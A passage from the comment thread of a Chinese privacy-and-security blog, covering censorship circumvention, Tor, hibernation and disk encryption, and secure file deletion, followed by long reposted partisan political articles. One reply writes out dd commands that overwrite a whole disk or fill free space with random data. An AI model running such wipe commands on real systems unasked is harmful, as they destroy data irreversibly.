      我个人认为:应该排除那些【严重审查互联网】的国家和地区,出口节点设置为非常注重隐私的国家和地区(但应该不包括前面提到的“十四眼监控联盟”国家),不知出口节点包括像罗马尼亚这类无视版权的(东欧)国家是否合理。

      删除
    55. 上一单元说错了,不是【排除出口节点】,而是【排除链路节点】,包括网桥和中继。

      删除
    56. 还有一个严重的问题:[b]万一有一天 GFW 使用【白名单制度】甚至【彻底断网】(大中华局域网),我们应该怎么办?[/b]
      有读者说博主在评论区讨论过这个问题,但我没找到 :(

      删除
    57. 博主在隐私相关文章里面提到过,[b]【在线时间】会构成某种信息量[/b],那么博主就应该把【评论发布时间】的链接去掉,这个链接含有【精确到毫秒】的 timestamp!

      删除
    58. 我在 32 单元讨论了【邮箱验证】的替代方案,那么博主认为有没有更好的【验证码】替代方案?
      Google reCAPTCHA 被认为是目前最好的验证码方案,但这个验证码的用户体验不友好,需要翻墙,而且在特殊时期由于网络原因经常弹出对话框,需要重新验证,严重拖延和浪费时间。
      而且之前评论区有读者提到,reCAPTCHA 可以通过语音识别绕过,并建议在 Hacker News 寻找合适的替代品。我甚至发现某个发帖都需要验证码的论坛里面有一些广告,说明 reCAPTCHA 仍然不够靠谱,说不定五毛刷屏也利用了这一点。

      删除
    59. 补充 57 单元:刚刚看了下手机版,发布时间不仅有链接,文本甚至精确到分钟!博主一定要尽快处理这个涉及安全的问题了。

      删除
    60. TO V2EX
      针对你提到的多个问题,俺分几批回复。
      由于本楼已经太嘈杂。关于“编程语言”和“安全加固”的话题,俺【另开楼层】回复你。以方便其它读者阅读。

      另,
      本楼疑似有 Zeroth Posclegomer 出没(俺不确定是“本人”还是“高仿”)。
      如果是本人,俺感谢老熟人来捧场 :)

      删除
    61. 博主在之前的安全经验总结文章里面提到,【桌面设备】与【移动设备】之间在隐匿方面的区别,那么【树莓派】(Raspberry Pi)以及其他 ARM 架构的设备(包括笔记本,不包括手机和平板,以下称为“ARM 设备”)属于哪一类呢?
      由于 ARM 设备的硬件和性能限制,加上架构不同,还没有支持该架构的虚拟机,只有 QEMU 这样的模拟器可以用,当然速度可想而知。但 ARM 设备的传感器显然没有移动设备多,用 ARM 设备进行【敏感操作】是否安全?

      删除
    62. TO 编程随想
      没错,根据我之前提到的【语言指纹】分析和对比,这位匿名读者就是之前的老熟人 Zeroth Posclegomer。

      删除
    63. TO V2EX
      (刚才已经在另外楼层回复了本文关于“编程语言”和“安全加固”的几个问题)

      [b]关于“移动端开发”[/b]
      先声明:这方面,俺没啥经验。
      你提到的 SDK 的问题,应该可以用虚拟化软件解决(比如“手机模拟器”)

      [b]关于“理想的 IM”[/b]
      俺之前点评过,链接如下:
      https://program-think.blogspot.com/2016/09/https-ssl-tls-3.html?comment=1475569427952

      关于俺本人的情况,
      感谢 21单元 复述了俺之前的观点 :)

      [b]关于“隐私保护的工具”[/b]
      感谢你在 8单元 的分享 :)

      [b]关于“地理信息”[/b]
      对于 Firefox,可以通过【定制】禁掉“Web Geolocaltion API”。
      如何定制,参见《[url=https://program-think.blogspot.com/2019/07/Customize-Firefox.html]扫盲 Firefox 定制——从“user.js”到“omni.ja”[/url]》

      [b]关于评论区的“匿名用户签名机制”[/b]
      俺还在考虑。
      关键还是【投资回报率】的问题。
      1、(对俺而言)开发工作量有点大
      2、潜在的性能开销(会增加:页面载入时间、浏览器的 CPU 开销)
      3、有好处,但还不够明显
      另,
      由于“编辑/发布评论”的页面位于【www.blogger.com】域名下,俺【无法】定制这个页面。
      会导致这个功能做出来之后,【易用性】比较差(每次写完评论,都要手工进行一次“复制/粘贴”,再发布)

      删除
    64. (接上一单元)
      [b]关于“BT sync 的替代品”[/b]
      暂时没有找到满意的替代品。
      开源的 Syncthing,在运作机制上【无法】满足俺的需求。
      相关的讨论如下:
      https://program-think.blogspot.com/2019/01/Memorabilia.html?comment=1547615526994
      https://program-think.blogspot.com/2019/01/Memorabilia.html?comment=1547625284313
      https://program-think.blogspot.com/2019/02/Use-Disk-Encryption-Anti-Computer-Forensics.html?comment=1550215744231

      你提到的 Sia 或者 Storj,俺暂时不了解(有空可以去看看)

      除去 P2P 不谈,BT sync 的关键性好处还包括如下几个:
      1、自动同步(相当于 push 模式)
      这方面,俺对 IPFS 的机制还不够满意。
      2、任何人都可以直接参与同步
      Syncthing 需要手工确认,做不到这点。

      删除
    65. TO 30单元的网友
      说不定胡编是在【无病呻吟】 :)

      删除
    66. TO 51单元的网友
      俺有同感。
      前几年,breakwa11 曾经在本博客评论区出没。
      俺还与之聊过几次。

      删除
    67. TO V2EX(56单元)
      关于你后来补充的几个问题,有些俺写到新开的楼层了。

      关于“物理断网的话题”
      之前聊过多次,最近一次的链接如下
      (下述留言中包含了前几年的讨论链接):
      https://program-think.blogspot.com/2019/05/share-books.html?comment=1559551192371

      删除
    68. TO V2EX(57单元)
      这个问题,前几年已经聊过很多次了。
      经常有新读者会质疑这个。

      从【根源】上讲,
      因为 blogspot 的评论系统在存储留言的时候,就已经保留了【精确到毫秒】的时间戳。
      俺在评论区界面上是否显示,并不重要。
      有心人想要查,总是可以通过 blogspot 提供的 RSS API 拿到精确时间戳。

      删除
  7. 博主介绍metasploit呀,大名鼎鼎的黑客工具。

    回复删除
  8. 这篇文章干货好多,而且通俗易懂,非常感谢!

    回复删除
  9. 博主您好,之前一直在看你的博客,也学到了很多东西。
    最近我想到了一个问题,一般来说出于安全考虑,最好把现代操作系统中的休眠(hibernation)功能给关掉,因为实现休眠需要把内存数据转储至本地硬盘,存储在硬盘上的休眠文件是一个安全隐患。这点在你之前的博文中也提到了。
    如果我对硬盘做了加密,休眠文件所在的分区(volume)也被得到加密的话是不是就可以避免这个问题?
    像在Windows家族中,NT6.2开始引入了一项叫做快速启动(fast startup)的功能,在这个功能开启之下,OS的“关机”不会是“shutdown”而是shutdown和hibernation的混合,就会涉及到休眠文件的问题,但是Windows同时也有BitLocker功能,它会把Windows分区进行加密,而起到引导程序作用的Windows Boot Manager在启动Windows前会先解密该分区才载入ntoskrnl。这么一来,休眠文件所在的分区都得到了加密,那是不是就意味着这个风险点就得到消除了呢?

    回复删除
    回复
    1. 看来你没有认真看博主那篇使用硬盘加密对抗警方检查的文章,你提到的这些疑问,文章里面都有解答。

      删除
  10. 技术小白看起来还是挺有难度的,感谢博主扫盲。

    回复删除
  11. 博主,我覺得這個很重要:什麼時候寫一篇從軟體到硬體,各個層面上的,怎樣徹底刪除一個文件的方法?

    回复删除
    回复
    1. 另外有個錯誤:網絡層那裡把物理層也打成第二級別了。

      删除
    2. 最後還有個問題:學習函數式編程需要很好的數學基礎嗎?大概什麼程度的?

      删除
    3. 彻底删除文件:Windows 用微软的 sdelete,Linux 用 shred, BSD / macOS 用 srm。
      擦除磁盘:所有 OS 都可以用 dd 来擦除磁盘。Windows 需要安装 msys2 或者 cygwin,不建议使用 dd for Windows,因为它没有 /dev/urandom 这个真随机数发生器的 device。
      [quote]dd if=/dev/urandom of=/dev/path/to/device bs=1024[/quote]
      (/path/to/device 是你的磁盘设备,bs 不使用 1M 是因为只有 GNU dd 才支持这种写法)
      填充剩余空间:
      [quote]dd if=/dev/urandom of=tmp bs=1024 count=size
      rm tmp[/quote]
      (原理是使用 dd 生成一个足够填满磁盘空间的随机填充文件,然后删除该文件,size 是你的磁盘当前分区剩余空间大小,要比实际空间大小更大一些,如果有多个分区,建议每个分区都操作一次)
      一般来说擦除和填充一次就无法恢复了,如果你不放心,可以重复几次,然后用数据恢复软件测试一下效果。
      物理销毁数据:直接把磁盘的存储介质砸坏,以完全无法恢复为准。

      参考资料:
      [url=https://ssd.eff.org/en/module-categories/tool-guides]EFF Tools Guides[/url]
      [url=https://en.wikipedia.org/wiki/List_of_data-erasing_software]List of data-erasing software [/url]

      删除
    4. 謝謝。 但是在[url=https://ssd.eff.org/en/module/how-delete-your-data-securely-linux##SSDs]如何擦除數據的 EFF 頁面[/url]上,我發現在 SSD 上完全刪除數據非常困難。

      删除
    5. 也許,最安全的方法是在物理上破壞磁盤,考慮SSD的特殊之處。

      删除
    6. TO Anonymousia
      博主之前那篇用加密磁盘对抗警方检查的文章里面有提到【擦除 SSD】的方法,大意是把每个分区都擦除一遍。
      另外 SSD 的数据恢复本身就比较麻烦,据说目前的数据恢复软件都无法恢复 SSD 删除的数据,需要找专门的数据恢复公司,不知他们是怎么解决这个问题的,博主是否知道相关细节?

      删除
  12. 平时疏忽了,只准备了两个大型服务商(cloudflare,u9un)的梯子,今天早上一看完全上不去了,赶快来编程这里说一声,以上已挂,大家注意一下信息整理。

    回复删除
  13. 我在本博客发现至少如下几种向博主提问的句式:
    会不会发生XX
    预测到底什么时候发生XX
    为什么一定会发生XX
    为什么发生了XX
    发生了XX之后对XXX有何影响

    对于预测类的问题,博主通常会回答:俺又不是算命滴

    回复删除
  14. 报告博主,SS加simple-obfs目前坚挺

    回复删除
  15. 有個問題想請大家指教。我要把舊電腦給父母用,但他們是連關機操作都要教的那種超級小白,所以問題來了——
    對於這種超級電腦小白,用什麼系統合適,Windows 還是 Linux?如果 Linux 更合適,應該選擇哪個發行版?
    大部分人印象中“Linux 使用門檻高,只適合熟悉技術的用戶”是不是先入爲主的觀念?

    回复删除
    回复
    1. 博主有发过 Linux 扫盲教程,不过如果你父母完全不懂电脑,还是 Windows 或者 macOS 比较适合。

      删除
    2. 安裝黑蘋果有難度,所以 macOS 就不考慮了。不存在比 Windows 更傻瓜易用的 Linux 發行版了嗎?

      删除
    3. TO 太甲真人
      黑苹果确实比较折腾,如果你的水平不够,不太建议折腾,尤其是给父母用的,出问题了更麻烦。如果钱不多,可以考虑买 Mac mini(不包括外设和显示器)。
      Linux 里面,Ubuntu 应该是最易用的了,但有个问题是缺软件(macOS 也有,但相关软件比 Linux 多)。比如你父母很可能会用 QQ / 微信,有时可能会炒股,这些在 Linux 很难找到替代品,macOS 倒是有这些软件。
      另外,Office 办公软件里面,只有 Windows Microsoft Office 最好用,WPS 和开源的 LibreOffice 这些都或多或少有兼容性问题,甚至 Microsoft Office for Mac 都有。
      博主推荐的 Windows 虚拟机方案,如果你的电脑配置不够,用起来可能会卡,体验下降。因此,如果一定要用 Windows,不要安装天朝的浏览器和杀毒软件(除了火绒,这个目前没问题 ),用 Firefox (别下载谋智中国版)或者 Chrome,可以考虑用沙箱(SandBoxie)隔离 QQ 这类流氓软件,注意这种方式不彻底。

      删除
  16. 文章还没看。今天自建的ss已经中招,这个配置从19大之后一直没出现过大故障,下午换地区后不到6小时又挂。另一方面,Tor反而比往常好用了很多。

    回复删除
  17. 曹长青:我怎样成为一个美国“右派”(图)
    【看中国2019年9月17日讯】我1988年刚到美国时,对左右派之争也不清楚。后来慢慢了解到两党两派的很多根本性不同。2003年写了下面这篇文章,谈自己怎样变成一个美国右派(保守派)的心路历程。虽然这是16年前的文章,但其中的思想转变,可能对想了解左右派理念不同的读者有所帮助,附录在这里供参考。


    刚入籍美国时注册民主党,但懂了经济问题后马上改成共和党。民主党不仅理论根基是社会主义,以善的名义剥夺个人权利;而且伪善,摧毁自由;其实质和结果是邪恶。
    中共1957年反右的时候我刚三岁多,所以还没有资格被打成右派。但是在美国我成了一个右派,但这不是被别人打成的,而是自己选择做的。
    或许是由于近年来我在文章中多次抨击西方左派,有的朋友对我怎么成了右派很是不解,尤其是想到右派是“保守派”的时候;因为在中国,“自由派知识分子”通常是指亲西方、反中共的;而“保守派”则通常是指维护政府派。
    但在西方这个概念正好反过来:“自由派(liberals)”是左派。如果以党籍划分,左派政党在美国主要是民主党,在英国是工党,在法国是社会民主党,在德国是社会民主党,在加拿大是自由党,在澳大利亚是工党等等。


    而“保守派(conservatives)”是右派。在美国是以共和党为代表,在英国是保守党,在法国是共和联盟,在德国是基督民主党,在加拿大是改革保守联盟,在澳大利亚是自由联盟党等等。
    其实,如果不按字面,而按两种观点的实际内涵,中文应把右翼保守派译成“传统派”,而把左翼自由派译成“激进派”。实际上在英文里也经常见到这种表达,说左派是radicals(激进者),而右派是traditionalists(传统者)。
    由于中英文翻译和其所表达的内容上的偏差,不仅中国人困惑,西方人也不解。我的一个朋友就曾非常巧合地在一个月内分别被美国两家大报(左派的《纽约时报》和右派的《华尔街日报》)社论版编辑问到中国的“自由派知识分子”到底是指持什么观点的人。
    为了清楚、简单起见,我在本文仍使用左派、右派。回想我自己在美国对西方左、右派的认识过程和经历,觉得写出来或许可以给那些对西方两大较量势力尚不十分清楚的中国朋友做一个参考。
    我1988年刚到美国时,主要感觉和体验的就是美国“太好了”!因为这个国家全方位的文明程度实在和中国反差太大,我像个六岁的儿童进了迪斯尼乐园,兴奋不已,看得眼花缭乱,根本看不过来。除了日常生活的体验之外,最初的几年,和许多刚从中国来的朋友一样,赶紧翻阅各种中文报纸,希望能尽快了解、熟悉这个国家。但从中文报纸得到的多是关于美国重大消息的笼统报导,再就是中国人的小区信息等。在中文报纸鲜少见到关于美国和世界重大新闻事件的讨论、专家们的评论,尤其见不到关于美国内部两党的政治分歧和争论的深入探讨。


    作为一个在中国大陆从事新闻和写作的人,我最主要关注的是美国的言论和新闻自由;所以一边拼命学英语,一边把主要精力用在学习和了解美国关于言论和新闻自由的具体情形和案例上。而对美国的民主制度只是感觉“真是好”,然后是和中国独裁专制比较之后的万千感慨,而没有顾得上去分清美国内部这两党之间的具体、细腻的区别。1991年订了《时代》周刊,开始连英语带美国一起生吞活剥;1992年开始订阅《纽约时报》之后,才开始具体地了解美国社会和政治。
    到了1996年夏天我和妻子一起入籍美国的时候,我们俩都自认为已经对美国社会和两党的政治理念有了比较清晰的认识,所以各自选择了自己认可的党籍。入籍美国时可以自由选择共和党、民主党、独立党等约六、七个党;也可以什么党都不加入。选择了党籍也没有任何义务,选举投票时仍是自由的,也就是说,你虽然注册了共和党,仍可以投民主党候选人的票,反之同样。
    当时妻子选择了共和党,主要由于三个原因:
    第一,她认为共和党人对共产主义本质的认识远比民主党人清晰;而民主党人则对共产主义、社会主义有太多浪漫幻想。她既无法理解,也无法容忍许多民主党人对共产主义邪恶的无知和宽容。
    第二,她欣赏共和党人的责任意识。共和党人强调每个人首先对自己负责。信奉共和党价值的人多是自律、发奋、敬业,脚踏实地勤奋工作。这点少数族裔中表现得似乎更突出。据她个人的阅读经验,少数族裔在各行各业中有突出成绩者,多数是共和党价值的信奉者。民主党人中当然也不乏成功者,尤其是在上层建筑领域;但那些一边靠领取救济金生活,一边参加反全球化等抗议游行的,也几乎都是民主党、左派。
    第三,由于她一直对西方女权主义、女权运动非常反感,甚至厌恶至极,所以对民主党的鼓动女权运动、强调未婚单亲母亲权益等等不以为然。而那些多次离婚、或生一堆孩子靠政府救济、或抛开家庭以做单身母亲为荣、或强调男女全方位绝对平等的走火入魔的女权份子们,则无一例外全是左派、民主党,甚至是共产主义的同情者或支持者。这就更把她推向了一直致力倡导传统家庭价值(family value)的共和党。所谓“家庭价值”主要是强调个人对自己负责、家庭对成员负责,家庭稳定是整个社会稳定的基础,不应把家庭责任推给社会。


    我当时则选择了民主党(1992年克林顿当选之后,我曾在《世界日报》和《开放》杂志等写了赞颂克林顿当选,欢迎老布什下台的文章),主要也是由于三个原因:
    第一,我认为民主党比共和党更强调言论和新闻自由,这点从许多关于言论自由的判案中可以清晰地看出,尤其是从最高法院的判例中;自由派法官比保守派法官更给言论和新闻自由空间。(但当今左派已经不能容忍任何所谓“政治不正确”的言论,这是另一文章话题,2019年注)

    回复删除
    回复
    1. 第二,民主党人似乎更关注世界人权问题。例如,九十年代初的那些年,对中国人权最关注和呼吁的美国众议员南希.波罗西就是民主党籍。美国国会推动世界各国人权的议案也多是民主党籍的议员提出的。
      第三,我觉得民主党人更善心,更具宽容精神;对穷人、少数族裔、移民等更关心,也更注重少数人的权益,像同性恋者的权益、女性堕胎的权利等等(当年对伪善、对民主党为争少数族裔选票等等都不清楚。2019年注)。另外,禁枪是民主党争取的一大议题。见到美国社会这么多由于私人拥有枪枝而导致的恶性事件,自然觉得应该禁枪。而对民众可以拥有武器、拥有保护自己、反抗政府的权利一说,感觉不强烈。认为在美国这么成熟的民主国家,这点似乎大可不必。
      入籍时我认为妻子选择共和党的三个理由十分充足,完全赞成;妻子认为我选择民主党的三个理由也有道理,也没有反对意见。于是,我们谁也没有劝对方加入自己的党,各自做了心满意足的选择。


      随后就是1996年的总统大选。作为从共产主义国家出来的人,我们都为第一次能参加投票,亲自选举自己的总统而十分兴奋,非常关注候选人的竞选议题、各项政策等等。在这个过程中我和妻子都发现了,在选择党籍时,虽然我们对两党主要理念的理解都是正确的,但我们同时都忽略了一个两党最重要的不同,或者说民主党与共和党最根本的不同,那就是经济政策的不同。
      我们以前很少关心经济问题的议题,以为美国这个资本主义国家,理所当然地在实行与共产社会那种计划经济完全不同的自由竞争的市场经济。既然是在自由经济的框架下,那么民主党与共和党的一些小的、具体运作上的不同也不必花功夫去了解,毕竟还有太多其它需要学习的东西。而中国文化人向来都不认为不懂经济是一项知识缺陷,甚至引以为荣。
      在关注96年大选的过程中,我们不仅意识到了民主党与共和党在经济政策上的严重分歧,而且明白了,左派民主党与右翼共和党在上述一系列问题上的不同,从根上来看,全部都和经济理念有直接的关系。所以,要想真正了解美国(和其它西方民主国家)的两党政治,左、右派的不同,首先必须弄清它们经济政策的不同,以及背后的哲学理念分歧。而在一个以市场经济为主的国家生活,不懂经济就像今天不会使用电脑一样,不仅是一个严重的知识缺陷,而且会直接影响你自身的经济利益。
      简单地说,共和党的经济理念是小政府,大社会,降低税收,削减福利,充分发挥市场这支“看不见的手”对经济的调节作用;尽量减少政府对经济的干预,缩小政府规模(减少政府开销、降低官僚主义)。


      而民主党的经济理念是,重视政府在经济活动中的干预作用,对富人和中产阶级提高税收,然后进行财产再分配,把征得的税钱通过福利制度分给穷人、留给政府(扩大政府开销,增加更多行政部门)。
      共和党认为,人之初,性本懒。如果纵容福利制度,那么会有更多的懒汉永远躺在福利制度上,吃别人的劳动成果;而且通过高税收的方式把富人和中产阶级辛苦挣来的钱以所谓“善心”的名义夺走、再分给穷人是不道德的。由于人的才能和条件不同,人们的财富不均不仅是正常的,而且是一个自由社会的必然现象和推动经济发展的根本动力之一。只要钱不是非法手段获得的,这种私有财产应该获得保护;“善心”不能大于“个人权利”。因此共和党强调经济上的自由竞争,主张走资本主义道路。
      民主党相信人之初,性本善。认为扩大福利制度,才有社会公义;不认为福利制度养出懒汉。他们追求财富的平均,认为“善心”高于“个人权利”,政府有权以“善”的名义收缴别人的私产,进行再次分配。因此民主党强调均贫富,主张走福利社会主义道路。
      在经济问题上,我是小政府、市场经济理念的热烈追随者,从根本上完全不能认同民主党的经济政策,而经济政策是其它政策之本,所以在第一次投票时,就毫不犹豫地背叛了自己入籍时注册的民主党,而把每一项的票全部投给了共和党候选人。随后在1998年的中期选举时正式把党籍改成了共和党。
      1996年投票选举的经验,促使我更加关注两党理念的分歧。而我对美国右翼理念的进一步理解、成熟和坚定是在系统地读了一些书籍和美国左右派报刊上的各种激烈争论之后。美国两党(其实是所有西方国家的主要政党)几乎在所有重大的问题上都有根本性的理念分歧,包括经济、国防、外交、人权、环境、死刑、堕胎、同性恋、枪枝管制、种族配额制、家庭价值等等。自胡适提出“全盘西化”的口号开始,无数中国知识人都在呼应这个口号;其实,从理念上来讲,存在“两个西方”,今后中国人要走民主自由的道路,到底要学哪个“西方”,以哪种理念为主,是至关重要的。所以就这些问题今后我会逐一撰文探讨。

      删除
    2. 反华博客”编程随想“的末日2019年9月19日 上午5:12:00

      驱除“低端人口”的北京要发高端人口“绿卡” 专家:歧视国人搞特权

      王倩

      2019-09-16 17:54

      北京政府新闻办9月12日在对外开放专场发布会上透露,北京正在加快建设8个国际人才社区,目前已有超过4000名外籍高端人才获“中国绿卡”。分析人士指,中共花巨资吸引“外籍”高端人才,实际是对中国人的歧视,给一些外国人以特权。而在中共治下,无论是“外籍人才”还是所谓“低端人口”,都失去了思想自由。

      【希望之声2019年9月16日】(本台记者王倩采访报导)北京政府新闻办9月12日在对外开放专场发布会上透露,北京正在加快建设8个国际人才社区,目前已有超过4000名外籍高端人才获“中国绿卡”。分析人士指,中共花巨资吸引“外籍”高端人才,实际是对中国人的歧视,给一些外国人以特权。而在中共治下,无论是“外籍人才”还是所谓“低端人口”,都失去了思想自由。

      目前,北京正加快建设朝阳望京、中关村科学城、未来科学城、石景山首钢、通州、顺义、怀柔科学城、北京经济技术开发区等8个国际人才社区。中共试图通过招收人才的方式,以期扩大自己的国际影响。

      时事评论员赵培16日接受本台采访时说,中共效仿美国发“绿卡”,实际是一种“挂羊头卖狗肉”的做法。

      【录音】一般人觉得它是在“东施效颦”,其实它是“挂羊头卖狗肉”。说到东施效颦,它是指共产党效仿美国、加拿大这些移民国家去吸引外来人才,但是共产党吸引的不是外来人才,它其实是给外国人提供一些特权的便利。最近确切知道的是一些跨国企业驻华的一些CEO或者高层的人拿到了。另外就是“红二代”他要回国定居,但是他们都已经入了外国国籍了,怎么办呢?给你个中共的“绿卡”。第三类人是它真正要用的,比如说现在中国足球队就规划外国球员嘛,它要教他干什么呢?爱党、爱国、学党史,你这是党国不分啊!你这过程中不是灌输中华民族传统的价值道德观,你是在灌输党的东西,所以你这东西就是“挂羊头卖狗肉”的行为。

      赵培指出,中共宁愿花巨资吸引“外籍”高端人才的做法,根本上是对中国人的歧视。

      【录音】那中国足球不行(的原因)是中国人不行吗?你非得规划外国球员啊?这是中国人很看不明白的一点。其实中共在北京清理“低端人口”和规划外国球员代替中国人去打球,(是因为)它瞧不起中国人。它那意思,你们不能为我共产党服务,我就找外国人为共产党服务。那中国人也是老不满意了,是吧。其实共产党就是歧视中国人,说白了就是这一点。你董卿,央视的主持,把孩子生到美国,给她孩子美国国籍,教育著中国人的孩子,你们要爱共产党。你这简直是侮辱中国人的智商呢,是不是?你根本就是在歧视中国人。

      著名中国问题专家伍凡指出,在中国,无论是“高级人才”还是所谓“低端人口”,都被中共当成“奴才”,成为为中共利益服务的一部分。

      【录音】共产党对自己的老百姓完全是当作一种工具,当作奴才,不管是“低端人口”还是“高端人才”,都是这样。它用你的时候,它就捧你,它不用你的时候,它把你踢掉,你要是不老实的话,它就关你、杀你,这是它一贯的立场。那么它现在不仅仅是在北京,它在全中国各个省的首府,象合肥、上海、广州,他们都在抢“高端人口”,因为他们觉得高端人口可以发展一些高端的企业、技术、科研,完了他们不但可以出口,还可以增加、壮大中共政策的力量,所以它就拼命地用各种手段要这些人才。

      而当这些人才进入中共管辖区后,也就同时失去了思想上的自由。伍凡说:

      【录音】那么在这种状况下,这种像奴隶般的劳动,它真正的创造能力能不能够自由发挥啊?我看不见得。因为你这也是一种管理非常严格的,虽然讲“人才库”吧,我认为是一个“奴隶库”,高级人才的奴隶库,这样来压榨这些高级人才,我想最终成功的效率并不会很高。在中国大地上,不管你是做大官、小官、高级人才和低级的农民,统统在共产党最高层这一批官员来看,“你们统统是被我利用的奴才”,没有任何心灵的自由,政治自由。

      删除
    3. 换马!美中将达成临时协议? 美媒:有个大事迟早要发生 反川普损全球经济也被戳穿

      路透报道说,美中10月初的谈判可能仅达成表面上的协议,美方立场从未改变,贸易战或成为长期战役。著名经济学家程晓农在大纪元撰文说,西方经济学家众口一词维护经济全球化,认为不应对中共加征关税,这将会损害全球经济稳定。程晓农认为,经济全球化恰恰是中共的帮凶,它使中共这样的极权政府做大,开始控制和颠覆西方社会秩序。


      近期对美中谈判则传出临时协议、秘密协议等消息。知名政治评论人士陈破空分析,临时协议将使中共继续获得喘息机会,逃过劫数,长期看不利于美国。另有美国媒体分析说,美中分歧是结构性的,临时协议只能使双方暂时偃旗息鼓,最终还是会谈崩。中共新华社说,中共财政部副部长廖岷率将率团访问美国,就美中经贸问题磋商。路透报道说,美中10月初的谈判可能仅达成表面上的协议,美方立场从未改变,贸易战或成为长期战役。著名经济学家程晓农在大纪元撰文说,西方经济学家众口一词维护经济全球化,认为不应对中共加征关税,这将会损害全球经济稳定。程晓农认为,经济全球化恰恰是中共的帮凶,它使中共这样的极权政府做大,开始控制和颠覆西方社会秩序。

      美中将达成临时协议,秘密协议,全面协议?

      海外知名政治评论人士陈破空16日在《自由亚洲电台》撰文表示,最近,围绕贸易战的美中博弈出现缓和迹象。

      同期传出消息称,美中可能达成临时协议,意即在全面协议达成前,先达成一个暂时协议。内容包括:中共加大购买美国农产品,停止盗窃知识产权;美方推迟部分关税加征。川普对此表态含混:会考虑临时协议,但更倾向于达成全面协议。

      陈破空认为,短期看来,达成临时协议对双方都有好处,但长期而言,却对美方不利。中共极可能在临时协议下获得喘息之机,获得更多与美国周旋、拖延的本钱,让全面协议变得遥遥无期。美中贸易问题又回到从前,中共用大宗购买来平息美方的怒气,一次又一次地逃过劫数,根本问题不了了之。

      据传,美中可能达成秘密协议。5月初美中协议已经谈成,习近平却反悔,原因之一:美方照例要公布协议全文,中共坚持不公开协议或只是部分公开。北京的意思是,尽管习近平向川普输诚,但一定要在国内民众面前保下面子,以免落得个“丧权辱国”的名声。

      然而,与中国这个专制大国不同,美国是一个民主大国,政府所签对外协议需要向国会报告,并需要对媒体公开,接受审议、评判和监督。由此可见,两国政府谈不拢,处处涉及制度差异和意识形态的对决。北京很期望美中达成秘密协议,但恐难以如愿。

      美媒:临时协议难救场,中美再谈崩迟早的事

      美国《国会山报》17日的报道,有分析指出,即使中美在短期内和解,这只是暂时在贸易问题上偃旗息鼓,长远解决贸易冲突仍难言乐观。中美都知道双方的矛盾是结构性的,而且两国在过去几十年形成的贸易格局,并非一朝一夕能够逆转。

      报道指出,就算被视为鸽派的美国财长努钦日前也表示,川普在谈判中拥所有选项,包括可随时提高中国进口货关税,也可与中共达成协议。由此可见,美方在结构性问题上,没有向中共让步。

      另一方面,在川普团队中,大部分都是对中共鹰派,包括副总统彭斯、国务卿蓬佩奥、贸易代表莱特希泽、白宫贸易顾问纳瓦罗等,他们的努力,使打压红色的中共政权成为华盛顿政治精英的普遍共识。

      美国外交关系委员会贸易专家阿尔顿(Edward Alden)表示,临时协议对川普而言将是一份“尴尬的协议”,会让川普受到民主党对手的攻击。因此,临时协议是否成事仍有待观察。

      换马 中共财政部副部长率团赴美磋商

      中共新华社17日报道,中国财政部副部长廖岷率领的代表团拟于星期三启程访问美国,就美中经贸问题进行磋商。

      此前,美国贸易代表办公室发言人星期一16日表示,美中两国贸易谈判副代表(副部长级)将于星期四开始在华盛顿会晤。

      外界注意到,即将举行的美中副部级经贸磋商的中共团长由中国财政部副部长廖岷担任,之前的同级别磋商是商务部副部长王受文担任中共团长。

      对于这个变化,总部在华盛顿的国际战略咨询公司 McLarty Associates的高级顾问郭嘉明(James Green)说,跟王受文不同,廖岷尽管没有涉及贸易和市场准入问题的具体权限,但是,他在贸易战的这一点上有足够的专业知识。郭嘉明曾经在美国贸易代表办公室担任过官员。

      路透:美中新一轮谈判最多达成表面协议

      路透17日报道,美中10月初的谈判可能仅达成表面上的协议。在美国方面,白宫经济顾问库德洛已在9月初警告,贸易战或成为长期战役。

      国际贸易咨询机构McLarty Associates执行合伙人、前美国贸易代表官员Kellie Meiman Hock认为,美中之间的任何最终协议,都极不可能有意义地解决美国所寻求的中共结构改革。

      现任美中贸易全国委员会主席(U.S.-China Business Council)Craig Allen称,由于对中共间谍活动、网路骇客攻击和知识产权盗窃的担忧,美国的高科技行业可能永久和中共脱钩。

      从川普总统及其贸易谈判代表在各种场合的发言,可以看出,美方在贸易谈判中的立场未变。

      程晓农:西方反川普加税捍卫全球化成为中共帮凶

      知名经济学家程晓农17日在大纪元撰文分析,经济全球化一度被看作是人类社会进步的标志和最高境界,甚至被一些左派戴上了“政治正确”的桂冠。自从中美经贸摩擦和冲突爆发以来,从西方经济学家到反川普的美国媒体,从欧洲和亚洲各国政府再到美国企业界的多数企业,维护经济全球化几乎成为众口一词的一面倒现象,虽然表述不同,但基本上都是希望回到经济全球化的状态,不要对中国加关税,以免影响全球经济的稳定。

      这种错误看法的根源是对经济全球化天然缺陷和中共制度走向的错误理解;进一步来讲,这样的错误看法故意忽视了极权政府支配下的超大经济体加入经济全球化之后的不良后果,也忽视了跨国公司境外投资设厂的行动对其母国之负面效应。

      程晓农表示,经济全球化无法改变也不可能取消国界。国界意味着一个国家的政府要保护本国居民的福祉,而不是优先照顾国界之外世界各国居民的需要;另一方面,民主国家的选民投票选举的是本国政府,而不是全球政府,他们选择本国政府的一个主要标准就是,执政党能否保护本国居民的福祉,而不是牺牲本国居民的福祉去实现政府的某些全球目标。恰恰在这一点上,西方经济学家们的认知出现了盲点,他们只从微观经济学的角度去认识经济全球化,只从企业的立场看经济全球化的好处,而忘了从各国选民的立场看问题。

      程晓农分析说,这个错误表现在两个方面:

      其一,西方经济学家相信,在全球自由贸易、自由投资的情况下,企业会追求最大利益,给世界经济带来最大的活力。但是,如果参与经济全球化的不单是西方的企业,还有中共那样的极权政府,那么,被中共政权捆住手脚的在中国西方企业将受制于中共政权;

      其二,发达国家的企业对发展中国家投资、转移生产线,确实能降低公司成本、增加利润,但是众多企业的同步动作可能造成本国制造业就业机会大幅度萎缩;而这些企业在全球化当中赚了钱,却未必在本国如数交税,他们利用离岸金融中心逃税时,公司当然占了便宜,但母国的纳税人却吃亏了,因为发达国家的政府财政收入不足,只能举债,要靠以后的纳税人来偿还。

      程晓农继续说,西方经济学家们犯的另一个错误是,他们从来不把宏观层面国家之间经济失衡的可能性纳入经济全球化的负面效应当中加以考虑。然而,迄今为止的经济全球化过程已经初步展示了,这种极权的超大经济体操纵经济全球化的可能后果。

      如果一个劳动力占全球六分之一的超大经济体加入了经济全球化,这个超大经济体可以通过吸引各国的投资和技术,形成完整的产业链,然后用廉价商品挤垮发达国家的制造企业,占领全球市场,最后造成全球经济对该国的经济依赖。结果可能是许多国家的制造业萎缩和严重的贸易逆差,最终造成国际支付困难。

